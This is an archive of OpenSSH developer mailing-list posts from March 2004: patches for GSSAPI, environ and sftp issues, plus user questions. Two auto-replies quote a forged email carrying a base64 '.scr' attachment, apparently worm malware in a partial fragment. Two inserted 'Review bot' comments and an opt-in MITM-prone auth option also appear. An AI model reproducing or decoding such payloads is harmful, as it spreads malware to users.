@@ -43,6 +43,7 @@ /* Try S/Key or TIS, authentication. */ int gss_authentication; /* Try GSS authentication */ int gss_deleg_creds; /* Delegate GSS credentials */ + int gss_enable_mitm; /* Enable old style gssapi auth */ int password_authentication; /* Try password * authentication. */ int kbd_interactive_authentication; /* Try keyboard-interactive auth. */ Index: servconf.c =================================================================== RCS file: /cvs/openssh/servconf.c,v retrieving revision 1.120 diff -u -r1.120 servconf.c --- servconf.c 23 Jan 2004 11:03:10 -0000 1.120 +++ servconf.c 2 Mar 2004 20:47:28 -0000 @@ -75,6 +75,7 @@ options->kerberos_get_afs_token = -1; options->gss_authentication=-1; options->gss_cleanup_creds = -1; + options->gss_enable_mitm = -1; options->password_authentication = -1; options->kbd_interactive_authentication = -1; options->challenge_response_authentication = -1; @@ -188,6 +189,8 @@ options->gss_authentication = 0; if (options->gss_cleanup_creds == -1) options->gss_cleanup_creds = 1; + if (options->gss_enable_mitm == -1) + options->gss_enable_mitm = 0; if (options->password_authentication == -1) options->password_authentication = 1; if (options->kbd_interactive_authentication == -1) @@ -266,7 +269,7 @@ sBanner, sUseDNS, sHostbasedAuthentication, sHostbasedUsesNameFromPacketOnly, sClientAliveInterval, sClientAliveCountMax, sAuthorizedKeysFile, sAuthorizedKeysFile2, - sGssAuthentication, sGssCleanupCreds, + sGssAuthentication, sGssCleanupCreds, sGssEnableMITM, sUsePrivilegeSeparation, sDeprecated, sUnsupported } ServerOpCodes; 
@@ -321,9 +324,11 @@ #ifdef GSSAPI { "gssapiauthentication", sGssAuthentication }, { "gssapicleanupcredentials", sGssCleanupCreds }, + { "gssapienablemitmattack", sGssEnableMITM }, #else { "gssapiauthentication", sUnsupported }, { "gssapicleanupcredentials", sUnsupported }, + { "gssapienablemitmattack", sUnsupported }, #endif { "passwordauthentication", sPasswordAuthentication }, { "kbdinteractiveauthentication", sKbdInteractiveAuthentication }, @@ -650,6 +655,10 @@ case sGssCleanupCreds: intptr = &options->gss_cleanup_creds; + goto parse_flag; + + case sGssEnableMITM: + intptr = &options->gss_enable_mitm; goto parse_flag; case sPasswordAuthentication: Index: servconf.h =================================================================== RCS file: /cvs/openssh/servconf.h,v retrieving revision 1.59 diff -u -r1.59 servconf.h --- servconf.h 31 Dec 2003 00:37:34 -0000 1.59 +++ servconf.h 2 Mar 2004 20:47:28 -0000 @@ -84,6 +84,7 @@ * authenticated with Kerberos. */ int gss_authentication; /* If true, permit GSSAPI authentication */ int gss_cleanup_creds; /* If true, destroy cred cache on logout */ + int gss_enable_mitm; /* If true, enable old style GSSAPI */ int password_authentication; /* If true, permit password * authentication. */ int kbd_interactive_authentication; /* If true, permit */ Index: sshconnect2.c =================================================================== RCS file: /cvs/openssh/sshconnect2.c,v retrieving revision 1.123 diff -u -r1.123 sshconnect2.c --- sshconnect2.c 21 Jan 2004 00:02:50 -0000 1.123 +++ sshconnect2.c 2 Mar 2004 20:47:28 -0000 @@ -226,6 +226,10 @@ userauth_gssapi, &options.gss_authentication, NULL}, + {"gssapi", + userauth_gssapi, + &options.gss_enable_mitm, + NULL}, #endif {"hostbased", userauth_hostbased, 
@@ -563,7 +567,9 @@ if (status == GSS_S_COMPLETE) { /* send either complete or MIC, depending on mechanism */ - if (!(flags & GSS_C_INTEG_FLAG)) { + + if (strcmp(authctxt->method->name,"gssapi")==0 || + (!(flags & GSS_C_INTEG_FLAG))) { packet_start(SSH2_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE); packet_send(); } else { From rac at tenzing.org Wed Mar 3 08:29:33 2004 From: rac at tenzing.org (Roger Cornelius) Date: Tue, 2 Mar 2004 16:29:33 -0500 Subject: environ problem in 3.8p1 Message-ID: <200403022129.i22LTW517908@tenzing.org> 3.8p1 added the following to main() in sshd.c: #ifndef HAVE_CYGWIN /* Clear environment */ environ[0] = NULL; #endif This breaks the getenv("TZ") in session.c and causes logins to occur in GMT time. It also causes any sshd syslog messages to be written in GMT time. I'm on SCO Openserver 5.0.7, but this looks like it should affect all platforms. Am I missing something? I haven't seen it reported before. Thanks. -- Roger Cornelius rac at tenzing.org From tim at multitalents.net Wed Mar 3 09:45:34 2004 From: tim at multitalents.net (Tim Rice) Date: Tue, 2 Mar 2004 14:45:34 -0800 (PST) Subject: environ problem in 3.8p1 In-Reply-To: <200403022129.i22LTW517908@tenzing.org> References: <200403022129.i22LTW517908@tenzing.org> Message-ID: On Tue, 2 Mar 2004, Roger Cornelius wrote: > > 3.8p1 added the following to main() in sshd.c: > > #ifndef HAVE_CYGWIN > /* Clear environment */ > environ[0] = NULL; > #endif > > This breaks the getenv("TZ") in session.c and causes logins to occur in > GMT time. It also causes any sshd syslog messages to be written in GMT > time. I'm on SCO Openserver 5.0.7, but this looks like it should affect > all platforms. Am I missing something? I haven't seen it reported > before. Perhaps it should be --- sshd.c.old 2004-02-29 15:36:01.351247001 -0800 +++ sshd.c 2004-03-02 14:41:32.551939053 -0800 
@@ -1106,7 +1106,7 @@ unmounted if desired. */ chdir("/"); -#ifndef HAVE_CYGWIN +#ifndef DISABLE_FD_PASSING /* Clear environment */ environ[0] = NULL; #endif Wendy, are Crays having this problem? Can someone on DEC OSF check this? > > Thanks. > > -- Tim Rice Multitalents (707) 887-1469 tim at multitalents.net From djm at mindrot.org Wed Mar 3 11:11:37 2004 From: djm at mindrot.org (Damien Miller) Date: Wed, 03 Mar 2004 11:11:37 +1100 Subject: environ problem in 3.8p1 In-Reply-To: <200403022129.i22LTW517908@tenzing.org> References: <200403022129.i22LTW517908@tenzing.org> Message-ID: <404522B9.3010107@mindrot.org> Roger Cornelius wrote: > 3.8p1 added the following to main() in sshd.c: > > #ifndef HAVE_CYGWIN > /* Clear environment */ > environ[0] = NULL; > #endif > > This breaks the getenv("TZ") in session.c Good point - this probably needs to happen a fair bit later, in session.c. -d From djm at mindrot.org Wed Mar 3 12:01:02 2004 From: djm at mindrot.org (Damien Miller) Date: Wed, 03 Mar 2004 12:01:02 +1100 Subject: environ problem in 3.8p1 In-Reply-To: <404522B9.3010107@mindrot.org> References: <200403022129.i22LTW517908@tenzing.org> <404522B9.3010107@mindrot.org> Message-ID: <40452E4E.80205@mindrot.org> Damien Miller wrote: > Roger Cornelius wrote: > > >>3.8p1 added the following to main() in sshd.c: >> >>#ifndef HAVE_CYGWIN >> /* Clear environment */ >> environ[0] = NULL; >>#endif >> >>This breaks the getenv("TZ") in session.c > > > Good point - this probably needs to happen a fair bit later, in session.c. Actually, this won't work - KRB5CCNAME gets set during the auth process. Perhaps we just need to blank a couple of environment variables. Comments? -d From dtucker at zip.com.au Wed Mar 3 12:44:43 2004 
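Review bot: in the sshd.c hunk (@@ -1106,7 +1106,7 @@), the guard around environ[0] = NULL now depends on DISABLE_FD_PASSING, a macro whose name describes descriptor passing rather than environment handling, and the explicit HAVE_CYGWIN exclusion is lost unless Cygwin builds also define DISABLE_FD_PASSING. Suggest a dedicated macro for platforms that need the inherited environment, or keeping the HAVE_CYGWIN test alongside the new one, and extending the /* Clear environment */ comment to say why the guard exists.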
From: dtucker at zip.com.au (Darren Tucker) Date: Wed, 03 Mar 2004 12:44:43 +1100 Subject: environ problem in 3.8p1 In-Reply-To: <40452E4E.80205@mindrot.org> References: <200403022129.i22LTW517908@tenzing.org> <404522B9.3010107@mindrot.org> <40452E4E.80205@mindrot.org> Message-ID: <4045388B.4090804@zip.com.au> Damien Miller wrote: > Actually, this won't work - KRB5CCNAME gets set during the auth process. > > Perhaps we just need to blank a couple of environment variables. Comments? Yes, that seems safer. I had a patch somewhere that had configure check for unsetenv() and emulate it in openbsd-compat if not found (probably attached to the original bug #757). -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From tim at multitalents.net Wed Mar 3 13:34:05 2004 From: tim at multitalents.net (Tim Rice) Date: Tue, 2 Mar 2004 18:34:05 -0800 (PST) Subject: environ problem in 3.8p1 In-Reply-To: References: <200403022129.i22LTW517908@tenzing.org> Message-ID: On Tue, 2 Mar 2004, Tim Rice wrote: > On Tue, 2 Mar 2004, Roger Cornelius wrote: > > This breaks the getenv("TZ") in session.c and causes logins to occur in > > GMT time. It also causes any sshd syslog messages to be written in GMT > > time. I'm on SCO Openserver 5.0.7, but this looks like it should affect > > all platforms. Am I missing something? I haven't seen it reported > > before. I failed to mention that I can't duplicate the problem on UnixWare, but I can on OpenServer. > > Perhaps it should be > > -#ifndef HAVE_CYGWIN > +#ifndef DISABLE_FD_PASSING > /* Clear environment */ > environ[0] = NULL; > #endif > > Wendy, are Crays having this problem? > > Can someone on DEC OSF check this? -- Tim Rice Multitalents (707) 887-1469 tim at multitalents.net From djm at mindrot.org Wed Mar 3 14:13:25 2004 
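The two approaches discussed in this thread, side by side, as an added example (not OpenSSH code): truncating the environment vector versus removing only named variables with an unsetenv()-style helper of the kind a compat layer would supply. The helper names, the constructed sample environment and the choice of KRB5CCNAME as the variable to blank are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define ENV_MAX 16

/* Constructed sample: what a daemon might inherit from the shell that started it. */
static const char *const inherited[] = {
	"PATH=/usr/bin:/bin",
	"TZ=EST5EDT",
	"KRB5CCNAME=FILE:/tmp/krb5cc_stale",
	"HOME=/root",
	"KRB5CCNAME=FILE:/tmp/krb5cc_dup",	/* duplicate entries do occur */
	NULL
};

/* Hypothetical blank list; the thread does not say which names to drop. */
static const char *const blank_list[] = { "KRB5CCNAME", NULL };

/* Return the value of name in envp, or NULL if it is not present. */
static const char *
env_lookup(char *const *envp, const char *name)
{
	size_t len = strlen(name);

	/* The '=' test keeps "TZ" from matching "TZDIR=...". */
	for (; *envp != NULL; envp++)
		if (strncmp(*envp, name, len) == 0 && (*envp)[len] == '=')
			return *envp + len + 1;
	return NULL;
}

/*
 * unsetenv()-style removal for platforms that lack it: compact the
 * vector in place, dropping every "name=..." entry, not just the first.
 * Returns the number of entries removed, or -1 for an invalid name.
 */
static int
env_remove(char **envp, const char *name)
{
	size_t len;
	char **src, **dst;
	int removed = 0;

	if (name == NULL || *name == '\0' || strchr(name, '=') != NULL)
		return -1;
	len = strlen(name);
	for (src = dst = envp; *src != NULL; src++) {
		if (strncmp(*src, name, len) == 0 && (*src)[len] == '=')
			removed++;
		else
			*dst++ = *src;
	}
	*dst = NULL;
	return removed;
}

/* Fill env with a fresh copy of the constructed sample. */
static void
load_sample(char **env)
{
	size_t i;

	for (i = 0; inherited[i] != NULL && i < ENV_MAX - 1; i++)
		env[i] = (char *)inherited[i];	/* strings are never written to */
	env[i] = NULL;
}

/* The 3.8p1 approach quoted in the thread: truncate the whole vector. */
static int
tz_after_full_clear(void)
{
	char *env[ENV_MAX];

	load_sample(env);
	env[0] = NULL;
	return env_lookup(env, "TZ") != NULL;
}

/* The alternative: blank only the listed names; returns entries removed. */
static int
selective_blank(char **env)
{
	int total = 0;
	size_t i;

	for (i = 0; blank_list[i] != NULL; i++)
		total += env_remove(env, blank_list[i]);
	return total;
}

int
main(void)
{
	char *env[ENV_MAX];

	printf("full clear keeps TZ: %d\n", tz_after_full_clear());
	load_sample(env);
	printf("selective blank removed %d entries\n", selective_blank(env));
	printf("TZ=%s KRB5CCNAME=%s\n", env_lookup(env, "TZ"),
	    env_lookup(env, "KRB5CCNAME") ? "present" : "absent");
	return 0;
}
```

Removing every matching entry matters because a vector with duplicate names can otherwise leave a second copy visible to whatever reads it next.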
From: djm at mindrot.org (Damien Miller) Date: Wed, 3 Mar 2004 14:13:25 +1100 (EST) Subject: BUG: SFTP (openssh-3.8p1) upload doubles "Uploading..." comment In-Reply-To: <20040227214920.64F0F34863C@gateway.mailvault.com> References: <20040227214920.64F0F34863C@gateway.mailvault.com> Message-ID: On Fri, 27 Feb 2004, Job 317 wrote: > Sorry, wasn't sure how to describe this well in the Subject line... > > I am using OpenSSH-3.8p1 from a RedHat 7.3 to OpenSSH-3.8p1 on a RedHat > 9.0 box. While SFTP-ing using the 'put *' command in SFTP, I get > duplicate verbosity (?) in the terminal for each file uploaded... You have found a bug, thanks. Here is a patch: Index: sftp-client.c =================================================================== RCS file: /cvs/src/usr.bin/ssh/sftp-client.c,v retrieving revision 1.46 diff -u -r1.46 sftp-client.c --- sftp-client.c 17 Feb 2004 05:39:51 -0000 1.46 +++ sftp-client.c 3 Mar 2004 03:05:36 -0000 @@ -805,13 +805,8 @@ max_req = 1; progress_counter = 0; - if (showprogress) { - if (size) - start_progress_meter(remote_path, size, - &progress_counter); - else - printf("Fetching %s to %s\n", remote_path, local_path); - } + if (showprogress && size != 0) + start_progress_meter(remote_path, size, &progress_counter); while (num_req > 0 || max_req > 0) { char *data; @@ -1032,8 +1027,6 @@ offset = 0; if (showprogress) start_progress_meter(local_path, sb.st_size, &offset); - else - printf("Uploading %s to %s\n", local_path, remote_path); for (;;) { int len; From djm at mindrot.org Wed Mar 3 23:30:13 2004 
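Review bot: in the download hunk (@@ -805,13 +805,8 @@) the meter now starts only when showprogress && size != 0, but the matching stop call is outside the visible lines; confirm it carries the same size test so that a zero-length fetch does not stop a meter that was never started. The upload hunk (@@ -1032,8 +1027,6 @@) still calls start_progress_meter() for any sb.st_size, so the two paths now treat empty files differently; a one-line comment stating which behaviour is intended would help.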
From: djm at mindrot.org (Damien Miller) Date: Wed, 3 Mar 2004 23:30:13 +1100 (EST) Subject: BUG: SFTP (openssh-3.8p1) upload doubles "Uploading..." comment In-Reply-To: References: <20040227214920.64F0F34863C@gateway.mailvault.com> Message-ID: On Wed, 3 Mar 2004, Damien Miller wrote: > On Fri, 27 Feb 2004, Job 317 wrote: > > > Sorry, wasn't sure how to describe this well in the Subject line... > > > > I am using OpenSSH-3.8p1 from a RedHat 7.3 to OpenSSH-3.8p1 on a RedHat > > 9.0 box. While SFTP-ing using the 'put *' command in SFTP, I get > > duplicate verbosity (?) in the terminal for each file uploaded... > > You have found a bug, thanks. Fix has been committed, it will be in the next release. -d From arise-help at pry.com Thu Mar 4 10:35:40 2004 
From: arise-help at pry.com (arise-help at pry.com) Date: Wed, 03 Mar 2004 23:35:40 -0000 Subject: confirm subscribe to arise@pry.com Message-ID: <1078356863.14335.ezmlm@pry.com> Hi! This is the ezmlm program. I'm managing the arise at pry.com mailing list. I'm working for my owner, who can be reached at arise-owner at pry.com. To confirm that you would like openssh-unix-dev at mindrot.org added to the arise mailing list, please send an empty reply to this address: arise-sc.1078356863.bdobopfgcnngnbelejpn-openssh-unix-dev=mindrot.org at pry.com Usually, this happens when you just hit the "reply" button. If this does not work, simply copy the address and paste it into the "To:" field of a new message. This confirmation serves two purposes. First, it verifies that I am able to get mail through to you. Second, it protects you in case someone forges a subscription request in your name. --- Administrative commands for the arise list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To subscribe to the list digest, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. 
Return-Path: Received: (qmail 14331 invoked by alias); 3 Mar 2004 23:34:23 -0000 Delivered-To: arise-subscribe at pry.com Received: (qmail 14327 invoked from network); 3 Mar 2004 23:34:18 -0000 Received: from unknown (HELO pry.com) (213.13.229.68) by 0 with SMTP; 3 Mar 2004 23:34:18 -0000 
From: openssh-unix-dev at mindrot.org To: arise-subscribe at pry.com Subject: warning Date: Wed, 3 Mar 2004 20:36:47 -0300 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="34222687" --34222687 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit misc --34222687 Content-Type: application/octet-stream; name="me.scr" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="me.scr"
AAAAAMDAwMDAwP///////8DAwMDAwP///////////////8DAwP///////////8DAwAAAAAAA AP8AAAAAAP8AAAAAAP///wAAAP8AAAAAAP///wAAAP8AAAAAAP///wAAAP8AAP////////// /////8DAwMDAwMDAwP///////8DAwMDAwP///////////8DAwAAAAP8AAAAAAP8AAAAAAP8A AP////8AAAAAAP8AAP////8AAAAAAP8AAAAAAP8AAAAAAMDAwMDAwP///////8DAwP////// /////////////8DAwP///////////8DAwAAAAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAA AP8AAAAAAP8AAAAAAP8AAAAAAP8AAP///////////////8DAwMDAwP///////4CAgAAAAAAA AAAAAAAAAAAAAAAAAAAAAP8AAAAAAP////////////////////////////////////////// //////8AAAAAAP///////////////8DAwMDAwMDAwMDAwICAgP///////////8DAwICAgAAA AAAAAAAAAP8AAP///////////////////////////////////////////////wAAAP8AAP// /////////////8DAwMDAwMDAwMDAwICAgP///////8DAwICAgAAAAAAAAAAAAP8AAAAAAP8A AAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP////////////////// /////////////4CAgP///8DAwICAgAAAAAAAAAAAAAAAAAAAAP8AAAAAAP8AAAAAAP8AAAAA AP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAP///////////////////////////////4CA gMDAwICAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////// /////////////////////////////////////////////////////4CAgICAgAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////////////////////// /////////////////////////////////////4CAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA gICAgICAgICAgICAgICAgICAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP/////+AAAA/gAAAP4AAAD+AAAA/gAAAP4A AAD+AAAA/gAAAP4AAAD+AAAA/gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAEAAAADAAAABwAAAA/+AAAf/gAAP/4AAH//////SH0BAAAA AQABACAgAAABABgAqAwAAAEAAAAAAAAAAAAAAAAAKK4BAPCtAQAAAAAAAAAAAAAAAAA1rgEA AK4BAAAAAAAAAAAAAAAAAEKuAQAIrgEAAAAAAAAAAAAAAAAAT64BABCuAQAAAAAAAAAAAAAA AABargEAGK4BAAAAAAAAAAAAAAAAAGauAQAgrgEAAAAAAAAAAAAAAAAAAAAAAAAAAABwrgEA fq4BAI6uAQAAAAAAnK4BAAAAAACqrgEAAAAAALyuAQAAAAAAyK4BAAAAAAADAACAAAAAAEtF 
Uk5FTDMyLkRMTABBRFZBUEkzMi5kbGwAaXBobHBhcGkuZGxsAFVTRVIzMi5kbGwAV0lOSU5F VC5kbGwAV1MyXzMyLmRsbAAATG9hZExpYnJhcnlBAABHZXRQcm9jQWRkcmVzcwAARXhpdFBy b2Nlc3MAAABSZWdDbG9zZUtleQAAAEdldE5ldHdvcmtQYXJhbXMAAHdzcHJpbnRmQQAAAElu dGVybmV0R2V0Q29ubmVjdGVkU3RhdGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= --34222687-- From jimpop at yahoo.com Thu Mar 4 12:55:53 2004 From: jimpop at yahoo.com (Jim Popovitch) Date: Wed, 03 Mar 2004 20:55:53 -0500 Subject: v3.8p1 from 02/24/2003 Message-ID: <1078365353.11414.26.camel@bluetoo> The www.openssh.org website shows v3.8p1 as being released on February 24, 2004, however some (might be all) mirrors show a tarball date of 02/24/2003 02:54:00 AM. This may or may not be of concern, but I thought it of enough interest to pass along. I'm not sure if anyone else should know about this, but I figured that you folks would. Thanks, -Jim P. From dtucker at zip.com.au Thu Mar 4 13:37:50 2004 
From: dtucker at zip.com.au (Darren Tucker)
Date: Thu, 04 Mar 2004 13:37:50 +1100
Subject: v3.8p1 from 02/24/2003
In-Reply-To: <1078365353.11414.26.camel@bluetoo>
References: <1078365353.11414.26.camel@bluetoo>
Message-ID: <4046967E.9080306@zip.com.au>

Jim Popovitch wrote:
> The www.openssh.org website shows v3.8p1 as being released on February
> 24, 2004, however some (might be all) mirrors show a tarball date of
> 02/24/2003 02:54:00 AM.

I picked one (ftp://ftp.it.net.au/mirrors/OpenBSD/OpenSSH/portable/) and
looked via ncftp:
-r--r--r-- 1 ftpadm staff 826588 Feb 23 19:54 openssh-3.8p1.tar.gz
-r--r--r-- 1 ftpadm staff 187 Feb 23 19:54 openssh-3.8p1.tar.gz.sig

Ditto with vanilla ftp. Also looks OK in Lynx (via a squid proxy):
[FILE] openssh-3.8p1.tar.gz . . . . . . Feb 23 19:54 808k
[FILE] openssh-3.8p1.tar.gz.sig . . . . Feb 23 19:54 1k

However, the same server viewed via Mozilla (via FTP, no proxies) is wrong:
openssh-3.8p1.tar.gz 808 KB 23/02/2003 7:54:00 PM
openssh-3.8p1.tar.gz.sig 1 KB 23/02/2003 7:54:00 PM
but via HTTP (http://ftp.it.net.au/OpenBSD/OpenSSH/portable/) is OK:
openssh-3.8p1.tar.gz 24-Feb-2004 03:54 807k
openssh-3.8p1.tar.gz.sig 24-Feb-2004 03:54 1k

The signature verifies and the md5sum matches. Maybe a date parsing bug
in Mozilla's FTP?

> This may or may not be of concern, but I thought it of enough interest
> to pass along. I'm not sure if anyone else should know about this, but
> I figured that you folks would.

As always, users are encouraged to verify the GPG signature and/or check
the md5sums against the release notes (from one of the mail list
archives, or http://www.openssh.com/txt/release-3.8).

-- 
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69
Good judgement comes with experience. Unfortunately, the experience
usually comes from bad judgement.

From jimpop at yahoo.com Thu Mar 4 14:02:47 2004
From: jimpop at yahoo.com (Jim Popovitch)
Date: Wed, 03 Mar 2004 22:02:47 -0500
Subject: v3.8p1 from 02/24/2003
In-Reply-To: <4046967E.9080306@zip.com.au>
References: <1078365353.11414.26.camel@bluetoo> <4046967E.9080306@zip.com.au>
Message-ID: <1078369367.11414.51.camel@bluetoo>

Thank you for the details Darren. To confirm, I am running Mozilla Firefox, and it would appear that this is a bug in the mozilla ftp client.

Thanks,

-Jim P.

On Wed, 2004-03-03 at 21:37, Darren Tucker wrote:
> Jim Popovitch wrote:
> > The www.openssh.org website shows v3.8p1 as being released on February
> > 24, 2004, however some (might be all) mirrors show a tarball date of
> > 02/24/2003 02:54:00 AM.
>
> I picked one (ftp://ftp.it.net.au/mirrors/OpenBSD/OpenSSH/portable/) and
> looked via ncftp:
> -r--r--r-- 1 ftpadm staff 826588 Feb 23 19:54 openssh-3.8p1.tar.gz
> -r--r--r-- 1 ftpadm staff 187 Feb 23 19:54 openssh-3.8p1.tar.gz.sig
>
> Ditto with vanilla ftp. Also looks OK in Lynx (via a squid proxy):
> [FILE] openssh-3.8p1.tar.gz . . . . . . Feb 23 19:54 808k
> [FILE] openssh-3.8p1.tar.gz.sig . . . . Feb 23 19:54 1k
>
> However, the same server viewed via Mozilla (via FTP, no proxies) is wrong:
> openssh-3.8p1.tar.gz 808 KB 23/02/2003 7:54:00 PM
> openssh-3.8p1.tar.gz.sig 1 KB 23/02/2003 7:54:00 PM
> but via HTTP (http://ftp.it.net.au/OpenBSD/OpenSSH/portable/) is OK:
> openssh-3.8p1.tar.gz 24-Feb-2004 03:54 807k
> openssh-3.8p1.tar.gz.sig 24-Feb-2004 03:54 1k
>
> The signature verifies and the md5sum matches. Maybe a date parsing bug
> in Mozilla's FTP?
>
> > This may or may not be of concern, but I thought it of enough interest
> > to pass along. I'm not sure if anyone else should know about this, but
> > I figured that you folks would.
>
> As always, users are encouraged to verify the GPG signature and/or check
> the md5sums against the release notes (from one of the mail list
> archives, or http://www.openssh.com/txt/release-3.8).

From dtucker at zip.com.au Thu Mar 4 20:15:00 2004
From: dtucker at zip.com.au (Darren Tucker)
Date: Thu, 04 Mar 2004 20:15:00 +1100
Subject: Minor Thread Bug In OpenSSH 3.8p1
In-Reply-To: <20040227202033.GA7078@reddwarf.ucs.ualberta.ca>
References: <20040227202033.GA7078@reddwarf.ucs.ualberta.ca>
Message-ID: <4046F394.9090904@zip.com.au>

Antoine Verheijen wrote:
> I have chosen to comment out the guts of routine import_environments() if
> USE_POSIX_PTHREADS is not defined as a solution, reasoning that this will
> also work if that routine is called by other parts of the code in some later
> version.

Patch applied, thanks.

-- 
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69
Good judgement comes with experience. Unfortunately, the experience
usually comes from bad judgement.

From kumaresh_ind at gmx.net Thu Mar 4 21:41:19 2004
From: kumaresh_ind at gmx.net (Kumaresh)
Date: Thu, 4 Mar 2004 16:11:19 +0530
Subject: SSH + Kerberos Password auth
Message-ID: <084f01c401d5$4af2e270$230110ac@kurco>

Hello,

I have a question about SSH with Kerberos password authentication.

Do I receive any host ticket to my client machine when I do ssh connection with Kerberos password authentication? If not, why?

If I log in to a remote machine through telnet with Kerberos Password authentication [through PAM-kerberos], then I can see the tickets with klist. But with the same setup for sshd, I cannot see the tickets with klist.

Thanks,
Kumaresh

---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.576 / Virus Database: 365 - Release Date: 1/30/2004

From arise-help at pry.com Thu Mar 4 22:43:34 2004
From: arise-help at pry.com (arise-help at pry.com) Date: Thu, 04 Mar 2004 11:43:34 -0000 Subject: WELCOME to arise@pry.com Message-ID: <1078399336.28439.ezmlm@pry.com> Hi! This is the ezmlm program. I'm managing the arise at pry.com mailing list. I'm working for my owner, who can be reached at arise-owner at pry.com. Acknowledgment: I have added the address openssh-unix-dev at mindrot.org to the arise mailing list. Welcome to arise at pry.com! Please save this message so that you know the address you are subscribed under, in case you later want to unsubscribe or change your subscription address. To unsubscribe, send a message to: --- Administrative commands for the arise list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To subscribe to the list digest, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. 
Return-Path: Received: (qmail 28435 invoked by alias); 4 Mar 2004 11:22:16 -0000 Delivered-To: arise-sc.1078356863.bdobopfgcnngnbelejpn-openssh-unix-dev=mindrot.org at pry.com Received: (qmail 28431 invoked from network); 4 Mar 2004 11:22:15 -0000 Received: from unknown (HELO i2kc02-ukbr.domain1.systemhost.net) (217.32.164.150) by 0 with SMTP; 4 Mar 2004 11:22:15 -0000 Received: from i2km95-ukbr.domain1.systemhost.net ([193.113.197.29]) by i2kc02-ukbr.domain1.systemhost.net with Microsoft SMTPSVC(5.0.2195.6713); Thu, 4 Mar 2004 11:24:16 +0000 Received: from i2km02-ukbr.domain1.systemhost.net ([193.113.197.79]) by i2km95-ukbr.domain1.systemhost.net with Microsoft SMTPSVC(5.0.2195.6713); Thu, 4 Mar 2004 11:24:16 +0000 X-MimeOLE: Produced By Microsoft Exchange V6.0.6487.1 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Subject: RE: confirm subscribe to arise at pry.com Date: Thu, 4 Mar 2004 11:24:16 -0000 Message-ID: <3D67CCA7D63E714B980D21A038EEA08E098865E1 at i2km02-ukbr.domain1.systemhost.net> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: confirm subscribe to arise at pry.com Thread-Index: AcQBe2h/LOHJPeL3TpmnFZC6AeNarwAX714Q From: To: Return-Path: alex.bell at bt.com X-OriginalArrivalTime: 04 Mar 2004 11:24:16.0423 (UTC) FILETIME=[3A813B70:01C401DB] Alex Bell BT Global Solutions SSC Integration & Implementation (I&I)=20 Telephone: +44 1923 668461 Mobile: +44 7817 711827 e-mail: alex.bell at bt.com=20 =20 Web: http://www.bt.com -----Original Message----- 
